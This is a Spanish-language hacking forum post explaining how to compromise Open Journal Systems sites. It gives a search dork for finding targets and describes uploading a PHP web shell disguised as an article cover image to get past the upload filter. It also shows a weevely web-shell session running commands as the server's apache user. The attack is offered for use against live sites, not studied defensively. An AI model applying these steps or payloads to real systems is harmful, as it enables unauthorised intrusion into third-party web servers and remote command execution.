elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Explotando [OJS]..
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Explotando [OJS]..  (Leído 2,503 veces)
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Explotando [OJS]..
« en: 30 Junio 2013, 18:00 pm »

Hola a todos,
bueno lo primero localizamos el sistema con la siguiente dork
Código:
inurl:public/journals/1/
Buscamos la raiz por ejemplo:
Código:
https://example.com/blah/lo/que/sea
Nos registramos y marcamos las tres casillas de ROL:
reader, author and reviewer...
creamos un artículo nuevo y usamos el uploader que hay para subir una portada para
nuestro articulo con extension pHp para bypassear el uploader o bien usamos live http headers
vamos a /public/journals/1/ y alli encontraremos nuestra shellcode renombrada a algo como:
cover_article_47_en_US.pHp
Voila!

PD: hasta la version 2.3.6 se puede hacer el upload con un submission en vez de con una portada, sinembargo esta suele estar parcheada.

https://www.htbridge.com/advisory/HTB23079

Código:
weevely http://mihost/public/journals/12/cover_article_21_en_US.pHp myshellpass
      ________                      __
     |  |  |  |-----.----.-.--.----'  |--.--.
     |  |  |  |  -__| -__| |  | -__|  |  |  |
     |________|_____|____|___/|____|__|___  | v1.0
                                      |_____|
              Stealth tiny web shell

[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.

[shell.php] [!] Error: No response
apache@:/var/www/html/public/journals/12 $ id
uid=48(apache) gid=48(apache) grupos=48(apache),100(users)
apache@:/var/www/html/public/journals/12 $ uname
Linux
apache@:/var/www/html/public/journals/12 $
[!] Exiting. Bye ^^
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Tutorial - Explotando aplicaciones con Heap Spraying « 1 2 »
Bugs y Exploits
soez 19 21,592 Último mensaje 4 Enero 2014, 03:34 am
por Max00355
Comprendiendo y Explotando un IFXSS
Hacking
xXSCORPIOXx 1 2,445 Último mensaje 2 Junio 2014, 04:39 am
por haxmstr
Explotando Bug OpenSSL - Heartbleed
Bugs y Exploits
Stuxnet 2 4,998 Último mensaje 21 Junio 2014, 05:45 am
por MCKSys Argentina
[Duda] Explotando BoF - No conseguimos ejecutar la shellcode
Hacking
GoKGz 0 1,838 Último mensaje 11 Diciembre 2016, 00:06 am
por GoKGz
Explotando MS16-145: MS Edge TypedArray.sort Use-After-Free (CVE-2016-7288)
Bugs y Exploits
MCKSys Argentina 0 2,922 Último mensaje 2 Mayo 2017, 17:41 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines